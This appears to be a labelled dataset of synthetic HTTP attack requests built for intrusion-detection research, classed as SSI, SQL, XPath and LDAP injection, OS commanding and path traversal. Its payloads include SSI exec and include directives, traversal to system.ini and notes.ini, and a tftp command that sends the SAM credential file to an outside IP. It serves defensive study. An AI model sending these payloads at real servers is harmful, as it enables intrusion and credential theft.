Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35699
Start - Id: 40221
class: SSI
POST /tUdbfoenetth/OwthusoAhsee2e9li/0ooco/zg_.uperle3IlinkF_Zlikeh/em/cRfShkpfV/fo0dPGm.YDfrj/uojwadiaJsw/AQftpiSWE.aspx? HTTP/1.1
Content-Length: 118
Content-Language: 0nye
Content-Encoding: deflate
Content-Location: /Cfwnao/eus4/siteeae.mdb
Content-MD5: b3BoOHBPNm5kYW5lZWJnYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Sep 07 04:50:22 GMT
Last-Modified: Sat, 03 Jun 06 24:39:29 UTC
Host: www.ojdrc5oik.biz:2881
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, gzip;q=0.9
Accept-Language: *
Cache-Control: no-transform
Cookie: nrrHueea=<!    #<!--  #exec     cmd="id"-->
Date: Wed, 29 Aug 07 21:00:01 UTC
ETag: "fEdZbQu8So3oNKR"
Expect: 100-continue
If-Modified-Since: Sat, 04 Jun 05 11:36:05 UTC
If-Unmodified-Since: Sat, 15 Jul 06 18:12:19 UTC
If-Match: "SuFz34gu8pm0UQJ"
If-None-Match: "NxCJPHXj3x814kfWGGP_"
If-Range: Sat, 01 May 10 11:38:21 UTC
Max-Forwards: 551
Pragma: no-cache
Authorization: NTLM Z2hkaXZ3NHVhdG9kRXJsYWVleGlubExuOWhha2RPcnRvb3RoYWZ0eTI4YzFm
Range: 92-76626,-676357,-5
Referer: http://eqobwt.st/khndetns.jpg
TE: trailers,gzip;q=0.7,deflate;q=0.0
Trailer: Trailer
User-Agent: 0t0set (iXJ34s5Up9; nkMCH4OIU; t2sIL9; h7.5K260Cj)
UA-CPU: StrongARM
UA-OS: Mac OS X
UA-Color: color32
Via: FTP/3.4 www.Kdtos.js, FTP/4.2 www.vldM.css
Transfer-Encoding: identity
----: ---------------------------

ctrioadulgaetem=eKbsi&tted=18175&nsntw=e&t+erservices  exechinputvl&crccr=58&uer8e2arkh=epso&2baegvoyeeyes=1288647

End - Id: 40221
Start - Id: 35218
class: SqlInjection
GET /7kN1wzF8l8Hj0rnK/6gseaax/opengroup byhtpassIJ.png?ojnhoonend=03&na=njxdap5cno62eh&ics1=uyo&en6fototki=5&0having7lpasswdgrmK=eslarinssvlr&ts1RstEptapof=%27++group+++by+users.id+++++having+15%3D15&inoaisylnuwfu=nwthoanTlt&rrahteyxN7d=waMsobfhemwywztot&mvdgenoglNkuu4r=Wuhv%7Cllnh+&0efeeoTaemhMgr=839993&E3JunionyAWT-M=tn%27httpOa&weeWr=ekK%40kUi_&W7hHVF=6124271 HTTP/1.1
Host: www.n0ppLcs.net
Connection: close
Accept: text/xml, image/*;q=0.0, audio/*
Accept-Charset: iso-8859-6, windows-1250, windows-1250;q=0.3
Accept-Encoding: compress, gzip, compress;q=0.3
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 247.223.116.97
Cookie: ne9oe=oFif0j
Cookie2: $Version="53"
Date: Tue, 28 Aug 07 17:24:27 CET
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 04 Nov 09 01:51:40 GMT
If-Unmodified-Since: Sun, 23 May 04 08:17:57 UTC
If-Match: *
If-None-Match: *
If-Range: "kd9TaOn9Hi2WMX@XmAwq"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: ehih2rqm='Vbe3Js'
Proxy-Authorization: eTi1ny Jxi3piru=smaxcs
Authorization: krfc hseft=nszeoobr
Range: -2,109-7
Referer: /ss4tr.html
TE: deflate
Trailer: Accept-Language
User-Agent: iDhteutl (ePcE0l; bcNXQ1; hFHeyR; kfk.lv4PY)
UA-CPU: Sparc
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: gzip
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35218
Start - Id: 43838
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: 152.107.172.225:80
Connection: dayer
Accept: image/*, text/*;q=0.3, text/xml;q=0.0
Accept-Charset: iso-8859-5, iso-8859-8
Accept-Encoding: 
Accept-Language: m-c, mce5e-io, miajfh-mA8uelim;q=0.4
Cache-Control: max-age=02
Client-ip: 34.114.34.166
Cookie: o3nra=H'o>%us5dakth
Cookie2: $Version="61"
Date: Mon, 06 Feb 06 12:36:03 UTC
ETag: "OgRXfIiZpYzKNFJj"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Sun, 01 Aug 04 24:37:47 UTC
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "huLhkN8ZOfTwqzaX"
If-Range: *
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM d3JhcnppaGF6bWlFYm5pUG9zZHQ0bGRFczBlc2g5b2NldW8w
Range: 653-,494-99921,2-094773
Referer: /anWo/teif.exe
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.0 (compatible; MSIE 2.2; Win98; himidceyta)
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: FTP/2.5 www.yRs5lad.jpg:43, HTTP/6.6 www.Eounll34.html, 2.7 www.htbccg.htm:22
Transfer-Encoding: eoshG
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43838
Start - Id: 48711
class: XPathInjection
PUT /aa/xVxIEgGnGJIY/iaen0winN/pt9tsTm/hyUx4gmD3/ic-ovRTuVQ_PfPPT3/6BwwT-9.cgi? HTTP/1.0
Content-Length: 297
Content-Language: ytszn
Content-Encoding: compress
Content-Location: http://www.teeiz.com/f47tgnsa.aspx
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 May 04 03:25:44 GMT
Host: www.reNoaa5ret.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=652
Client-ip: 193.98.182.250
Cookie2: $Version="63"
Date: Tue, 12 Jan 10 14:48:21 UTC
ETag: "Rcq9up9t0BxEr6w1D"
Expect: Rtmzs=reuExi
From: 0Czsri@otpu.uk
If-Modified-Since: Fri, 08 Jan 10 01:14:56 CET
If-Unmodified-Since: Sun, 25 Jan 09 24:06:23 GMT
If-Range: Thu, 25 Dec 08 09:05:04 UTC
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: hrda i93os=hoee
Range: -4,59993-18,28-7301
Referer: /ihiqn/suae9n/zltmk/e6iuh/lhao3z.jpg
TE: trailers,gzip
User-Agent: rWI3KUaoaX http://www.nxrh.uk
UA-CPU: MIPS
UA-Pixels: 181x2087
Transfer-Encoding: arinh; r4rSt=raiie
Upgrade: aer/1.4, ieE/6.5, hbq/3.1
X-Serial-Number: 586508390592927979

kroae=Tinm5'    or    6   <     count(path/child::*) or  'diaEhi'  =   '&mn=pbJQtkYpUO&cCt=Say&elcmeysyhnaeuTb=3&echobQhL=wNvXaSr&o7MuvC=owtle3tbetn9&a94xess7aA2=18091006&ayodnPraeceheEo=1415369&euoao9s8=~@Sukuaopenmlike&rmtkNynlTF5etso=991574&naseh=sel+&6zAtK=etsTOYPt

End - Id: 48711
Start - Id: 39163
class: SSI
GET /2e/nttonboiig.png?e8=cevalx+adelete1shbetween8hm&octfxo=420952056&de8ohameo=2375&Vconnectunionf8VchildZ4YAL=7822 HTTP/1.0
Host: www.mseis2i.uk:229
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 46.124.108.226
Cookie: onoN=iftaCv6;catbAPboot.iniVRy.9j=<!--#exec     cgi="/cgi-bin/script?droaawqtdz" -->;Oau1=hrOe2NtNk;sn=nsynnls
Cookie2: $Version="8"
Date: Sun, 30 Jan 05 23:01:06 UTC
ETag: "H@fBpxTD@WpGAkw"
From: bjtwmfi8@qnsa.be
If-Modified-Since: Thu, 19 Mar 09 05:05:55 UTC
If-Unmodified-Since: Mon, 23 Nov 09 24:49:02 CET
If-Match: "9sBON4QbPAtx36SZN6"
If-None-Match: "Xa9E-Im6GANCtVH1PMQ"
Max-Forwards: 400
Pragma: no-cache
Authorization: NTLM Tnpycms4YXRtYTdoaW9qbkVhcmFtcnRkc3ppbGd0c2VJc2N1YWw=
Range: -62422,279-3879,-5
Referer: http://sp3ln.be/eyfoh/aj9ekz/eFedE4/ebaindt.cfm
TE: trailers
User-Agent: ttwyrdsnc/5.4.3
UA-Color: color16
UA-Pixels: 983x7791
Via: 3.3 31.166.178.29, 8.8 www.pnseefs.shtml, 0.9 5.191.237.201
Transfer-Encoding: compress
Warning: 861 www.usjt.css:2053 "Ptob3tjhlooTner" 
X-Serial-Number: 9213674294
----: -------------

null

End - Id: 39163
Start - Id: 43261
class: OsCommanding
GET /bfs/bl.logjinsertD/loec/iccoah/eRmI6a47yVY9lcWKOxH/eElcat/nWa-K55-Z.dll?saneueLi1i=t+lfromeS%7E&uorebst=mail+++++cst%40rd4aee.d2snsmt.gov+++%3C%3C+++%2Ftmp%2Fwu.c+%3B&n12se6Danl=cDo&ie=6&reAbytrgna=xzeotrraXEsvne&Snehi=asat&RjL.R7=sLb7lp&6pssshtc=o9-3n32KPh.K&aDrle6hOe4eH8ir=reenL9n%26hheh&7ebb29tahip=aietredohybohnjtoF HTTP/1.0
Host: www.nna0uO.it
Connection: qdaticsy
Accept: image/*;q=0.4, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=554
Client-ip: 34.71.205.66
Cookie: nzt0uBresnUi=nw
Cookie2: $Version="54"
Date: Fri, 25 Jan 08 09:21:53 GMT
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Thu, 30 Apr 09 08:04:16 CET
If-Unmodified-Since: Sat, 06 Feb 10 14:06:02 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Jan 10 08:08:24 UTC
Max-Forwards: 822
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: NTLM aWdlaUlid25PcGhlemNoZ2Vyd3RuU3dnOWhwc3UyU2lpcg==
Range: -640387
Referer: http://www.ovanc3n.st/bstaJh/Ioopts/bsi4fsp.bin
TE: gzip,chunked,trailers
Trailer: Via
User-Agent: mBMe8pZ-AH http://www.bhscneD.net
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 3.5 147.116.170.65, oyk/3.9 18.43.240.207, 8.9 29.18.197.225
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43261
Start - Id: 38211
class: LdapInjection
GET /ybliu/nXWtnioHsAnia/suNE76Lo50l/qE/allNUupuaqqJGprocessing-instructionYa/sqfSvbscript@/eMFpOjGd72CEOJhSi6V.tiff?elR9=mg%5Dyt8s+esctbze%24+&I9nh6aiaosaco=%29++%28%7C+++%28aurdi%3D69r*%29&ile5gntiacAa=QysAn%40ith&hu1hf8nh=r6tsr&ulnfc14=tmf+Rt+&emin=s3e&dLtr3e52te=0650582&w4cfhe4e2962t=hcauhoy&koSsmjictroi=778002596&ilhk9eec4Rduos=or&aoe=Phbetweenwhereosa&dtpb97s=68491192&al4c0htak0raazb=qLnth&uehibtjb=e+&bsttehgy=15 HTTP/1.1
Host: www.mTshn2b.cz
Connection: cass5flx
Accept: image/jpeg;q=0.8, application/postscript
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: lDtiin='d'
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="98"
Date: Sat, 19 Aug 06 17:00:17 UTC
ETag: W/"aPd7NLiKRbSbcJc"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Wed, 10 Jan 07 09:26:57 CET
If-Unmodified-Since: Mon, 31 Dec 07 24:31:08 GMT
If-Match: "FDBpizOJvU@tAnq_W9"
If-None-Match: *
If-Range: Fri, 10 Jul 09 23:12:56 UTC
Max-Forwards: 28
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: NTLM ZWVMMnJoZWVDdnZlWGhoZmxZZDJlQXBjZHdsMmNlVHNmTG5vYw==
Range: 1527-875,9678-
Referer: http://www.dtae.biz/ieedaas/rjeto/eYreni.tiff
TE: trailers
Trailer: Warning
User-Agent: rdsLpKr4uS http://www.Soe0lcss.fr
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 321x2267
Via: 5.8 www.i7dp.js
Transfer-Encoding: identity
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 770 111.10.145.180 "gcnref5ut" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38211
Start - Id: 37321
class: LdapInjection
GET /3iseh/ysnseikonwue8nt/r37E/tVidnarftsgmios/4nchu/lebamnnoe/nM/Antv1nItaphjli/JSULbgsoundSrT.nsf?esCdctam=auh7ees5QfDt&aen=Bs&c0red=%3Eql%27&sc3=ds&uiakese=Nnte&mdsumhh=ln&fu=e1JIyyZ&-k_f-=7&24HwSiEcnsd2a=ar1mdS0c&Hu7@=sS96&neathh7acaacuse=%24s&lStswh=550935 HTTP/1.1
Host: 78.226.229.143
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.0, iso-8859-8-i, iso-8859-8;q=0.8, iso-8859-1
Accept-Encoding: )   (   |(    cn=*o 'brien*)(mail   =*o'brien*  ) 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 68.215.146.126
Cookie: bcd8tl=tuizGPU
Cookie2: $Version="6"
Date: Mon, 20 Jul 09 09:46:42 CET
ETag: "SqzTXG3cL_LrKvg7K"
Expect: ycThenic=djsI
From: rtec@se2cehaQn.com
If-Modified-Since: Fri, 03 Jul 09 12:02:52 CET
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: *
If-None-Match: "b5d.3QlkL0b1@pFN7GZ_"
If-Range: Fri, 26 Feb 10 13:48:16 CET
Max-Forwards: 8
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM aWgzbmF0aXNlZnNlcjlodG1hdGxtU3IycnRsZWFPTjdibms=
Authorization: NTLM ZWFvbFN0dFJNYzBqcmUyM2x0ZXR1cm50bzRDYTluZEZuZWVjeWY=
Range: 1-568088,6956-8,075-
Referer: http://www.rItftrDt.net/omfiAict/elrxye/uosu/tOust6i/nopoL.nsf
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 1.2; am-np; rv:2.7.7) Gecko/60478571
UA-CPU: StrongARM
UA-Disp: 2661,0577,16
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: deflate
Upgrade: wnnr/5.6, rfetYt/6.7
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 220.106.136.48
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37321
Start - Id: 39679
class: SSI
GET /ergEoausAsrOo4siotip.php3?9L3b=%3C%21--+++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E HTTP/1.1
Host: www.ue1ls.gov
Connection: dlrrn
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=658
Client-ip: 17.56.25.243
Cookie: DS_K4yWxmlt=824;h8fe=t]i
Cookie2: $Version="18"
Date: Thu, 24 Feb 05 02:04:43 UTC
ETag: "MnC6RG5yCfdECDak"
Expect: treOe=e9zoc
From: ticao@thcc.com
If-Modified-Since: Thu, 15 Apr 10 23:08:48 GMT
If-Unmodified-Since: Mon, 27 Dec 04 08:23:44 GMT
If-Match: *
If-None-Match: "-b1LaesQynEWv0giUd"
If-Range: *
Max-Forwards: 4392
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=bfF4DAEf
Range: 047-,52-2392,30343-939979
Referer: /osToeH/wm3lyje.jpg
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.2 (Machintosh; U; Mac OS X 0.9; ej-nf; rv:7.4.0) Gecko/72673019
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/6.5 www.eehma.html:0137, enr/2.5 www.ojn7cmy.htm
Transfer-Encoding: gzip
Upgrade: id8d/1.6, amqh/8.3, de3ts/9.5, se7lsr/8.4
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39679
Start - Id: 36220
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: 245.186.106.220
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr;q=0.1, iso-8859-15, euc-cn;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=125
Client-ip: 253.92.235.246
Cookie: A0ruzsuariit=csm2Ce5Ruyihlsdh;wouervt=rhwflIqdyehH;JqFTsE6=g/f+;1a=e6eir
Cookie2: $Version="6"
Date: Thu, 14 Jun 07 24:55:36 CET
ETag: W/"3f1XJysaM8JKnKP718"
Expect: b5ooxi=dd0uA
From: aesn@tdnix0ah2.ch
If-Modified-Since: Mon, 21 Feb 05 05:42:28 CET
If-Unmodified-Since: Wed, 03 Dec 08 10:02:56 GMT
If-Match: *
If-None-Match: "L5ApjO1QIDT3CZbXXwz"
If-Range: Fri, 01 Jul 05 03:25:10 CET
Max-Forwards: 4
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM YWVjZTlzYU45cmVub3RwVGVldGJpZ3RvdGw0ZXRsZkVja21zYnRuamk=
Range: 183-
Referer: /hehc/saooEt/1osr/rRxe/9eW0ed.gif
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 2.9; Ei-ry; rv:0.9.1) Gecko/87988038
UA-CPU: StrongARM
UA-Disp: 399,5892,8
UA-OS: Win98
Via: HTTP/5.2 www.eri0ib8.css:8671, HTTP/5.1 www.aneebj.shtml, HTTP/7.0 www.Abtrtn.html
Transfer-Encoding: gzip
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36220
Start - Id: 49469
class: XPathInjection
GET /NiBm/rdtAHeeIorb5opds/oetsveare/mailNxp_dropL/QC47BZ4A8jY3cYimg/acrheNEiEb/hrelCauet/zSPB6SOA@Wb/dMMMEsBPARfsa/mvQ.bin?rtl2eqFya=84353469&t3hf=3&1c6armchweie6=6759019804&a3hc=%5Do&rieImeidu=ibrge&bGsd=eREtelnetsdexec7ounionr&eb=enmc6e&5jssot7Qt=31934470&1pofh9Eth=toOiiwkt&8wneia0Rta6oBaa=43%27+++or+++++1%3C++niisl%2Fb5ffc%2FmC5%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++++or+%27hSgqlbs%27+%3D%27&etn=76722886 HTTP/1.1
Host: www.pLhx7.net:80
Connection: close
Accept: image/*;q=0.0, text/*;q=0.8
Accept-Charset: windows-1251;q=0.5, euc-kr;q=0.0, windows-1254, iso-8859-6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=27
Client-ip: 200.92.12.13
Cookie: eJissn=3508248;bwtui=Gph
Cookie2: $Version="182"
Date: Mon, 31 Dec 07 08:04:54 UTC
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 5renn=tz0whpeo
From: 8tns@scEoyunm.org
If-Modified-Since: Tue, 25 May 04 19:26:20 GMT
If-Unmodified-Since: Thu, 22 Sep 05 03:08:52 CET
If-Match: *
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 73
MIME-Version: 2.1
Pragma: oboc=ei2EbgBn
Proxy-Authorization: ledega 1phesBu=nKn6nse
Authorization: Digest nonce
Range: -012
Referer: http://www.tlIel.cz/eicsevn/ar2e/neeue4n/oois8m.asmx
TE: gzip;q=0.0,gzip
Trailer: Cache-Control
User-Agent: ioud/6.7.9.3.6
UA-CPU: PowerPC
UA-Disp: 198,205,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 527x1451
Via: 7.8 www.snxjsone.shtml, FTP/4.9 www.en7ieCVe.html, 3.3 206.21.178.194
Transfer-Encoding: identity
Upgrade: nueei/2.7, enf/8.5
Warning: 811 www.h0iseed.jpg "Eayaooe2bzy9a" "Fri, 24 Nov 06 06:59:07 UTC"
X-Forwarded-For: 64.1.22.247
X-Serial-Number: 008046
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49469
Start - Id: 45730
class: PathTransversal
GET /dgER4bph2aD5Y/AbsiE/O8@samhomeaCOperlRTU5/eHAUfO_u3H/sstetico/m9gqao9MZ9LF-p.jpg?lrnwredeoakz=u%29A3D&6eoen=%5CWINNT%5Csystem.ini&eeatfkr5a8c0=z-puQdJ4uzm&NaoLeaoiceTon=892534884&en6=264&RaknNOi=ar%28r%7CtErcpty+ltNm&nvwmQMz=tJdbwk7f&lga=6492190&ne3len9=eetorlare&ksloEt4ors9=0&oza5vai=liu HTTP/1.0
Host: www.aLuslir.biz:4838
Connection: auttd
Accept: image/*;q=0.9, text/plain;q=0.3, audio/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 195.34.194.222
Cookie: wm=ehttps$o0
Cookie2: $Version="66"
Date: Fri, 15 Apr 05 07:42:23 CET
ETag: W/"6TA0sUBIpgg4.xGcl"
Expect: 100-continue
From: 9e6jh@oniedt.gov
If-Modified-Since: Fri, 27 Apr 07 03:14:14 GMT
If-Unmodified-Since: Fri, 28 Dec 07 20:53:53 CET
If-Match: "zV-@oqkVqR8x0SaT1"
If-None-Match: "PDuDe4SZ2XeT@Fa8S"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: http://www.embmm.gov/aiil/ctoheU/oiae.aspx
TE: chunked;q=0.2,trailers,trailers
Trailer: Expect
User-Agent: llyceKdhn (s@OpXhE1T; iqSV04-; uSU0MyW-pN; mLHWOfmW)
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 979x8035
Via: syde3/3.0 www.4daNth.gif, sbrt/9.8 www.w7ebrll.png:87811
Transfer-Encoding: identity
Upgrade: eebc/8.1, RfQc/0.5, iec/8.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 45730
Start - Id: 44578
class: OsCommanding
GET /ul6hRFBObX/kfF0/AtoDHIuKwG9b/WzsorbodyYMi/tw7nsseMe3ez/iATaISF2ipeJ/pdlcPR7.6au47@a0Wvn/tbC/rrv.02pJp6/6tfygeCeeIyesefi8l.html?ls=cacceptr3aW+o+Sseewc&e2xidikee1=%280ps0%3AnaaE&yLhAnetcatnJO=49&aiNedS1k=0&ilmosT4omHaeu1=164.189.133.55++%7C+++++tftp++-i++++14.75.113.216++++PUT+sam._ HTTP/1.1
Host: www.eSsn.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: iUfb-2Bs, td0bp2eE-s1, ovym8-ets8e, e-pptec, vTuanbao-s;q=0.0
Cache-Control: min-fresh=9740
Client-ip: 161.135.140.107
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Date: Sat, 08 Apr 06 16:48:09 UTC
ETag: "5lZWmVQ5I_0NdPW17aq1"
Expect: 100-continue
From: ne1pNm@taromiNse.be
If-Modified-Since: Thu, 11 May 06 09:10:30 UTC
If-Unmodified-Since: Sat, 03 Mar 07 20:17:01 GMT
If-Match: "AKSK2K67PW_WvHrme"
If-None-Match: *
If-Range: "-x@gyRuBYqkDCwoP"
Max-Forwards: 0
MIME-Version: 0.9
Pragma: reqiA='h'
Proxy-Authorization: Digest realm
Authorization: Basic NWx1cDpkbnduZg==
Range: 746-,-10102
Referer: http://www.nerlao3.net/4aneai3a/ENe8f9e/d2sinc5i/hyE7hBt/q0ldaxnn.css
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: Mozilla/3.8 (X11; U; Open BSD i586 2.1; yh-vs; rv:0.4.0) Gecko/06618877
Via: HTTP/2.5 31.37.238.229:80545
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44578
Start - Id: 42012
class: SqlInjection
GET /bepuex/aHypUV_iQIUme5Ih58/uH6xltacletceAreugA/rRrDOm@GEGrJI4.php4?Uopt3tWprocessing-instruction3RBPimgB=%2Bd%25u&cntapone=1r%3C&osock_streamobq=d%27t&heeno6g6u=OR+++%27seuansw5%27++IN+%28++%27++%27++++%29&snwe6q5ib0=%2Biu%3B HTTP/1.1
Host: www.xaal.it
Connection: hAeb5sm
Accept: */*
Accept-Charset: x-mac-arabic, windows-1255, windows-1251
Accept-Encoding: *;q=0.2
Accept-Language: i-medlexp;q=0.8
Cache-Control: min-fresh=006
Client-ip: 209.185.53.108
Cookie: eerdt4eHrbi=iUGMUEFadD;eehim=k'oiEo:c;it=767803861
Cookie2: $Version="53"
Date: Tue, 27 Dec 05 14:21:39 CET
ETag: "6Uyl2Y07moKN10dFmON"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 04 Oct 06 22:40:15 UTC
If-Unmodified-Since: Sat, 18 Oct 08 11:49:49 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Jul 09 22:02:34 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: http://Rdkut.com/aiaqu/Yevot/0ttmaro/soaxssps/ormno.js
TE: trailers,trailers
Trailer: Trailer
User-Agent: ji7bnyuaei
UA-CPU: Sparc
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: 2.8 104.24.217.201
Transfer-Encoding: compress
Upgrade: efau/6.6
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42012
Start - Id: 39497
class: SSI
GET /xdlet/dqf/blarvsr/aen/mRJvhzoWpZNVLz/e4bgz6fOstSnaemmaa/wa94AHX1U_pZUi59e/dpc4AJnRW.sl-HnKV/a136/soiucywNhmwesig.bin?sibslesbijw=-rr&64t3deiZxrttd=+tess%27tie%5B&htoiauciw=ieobject&fem4aitf=itse+eusrh3sl+k&ilgvtpklditta=%2F%5B9%27%26+k HTTP/1.1
Host: 35.82.160.151
Connection: close
Accept: */*
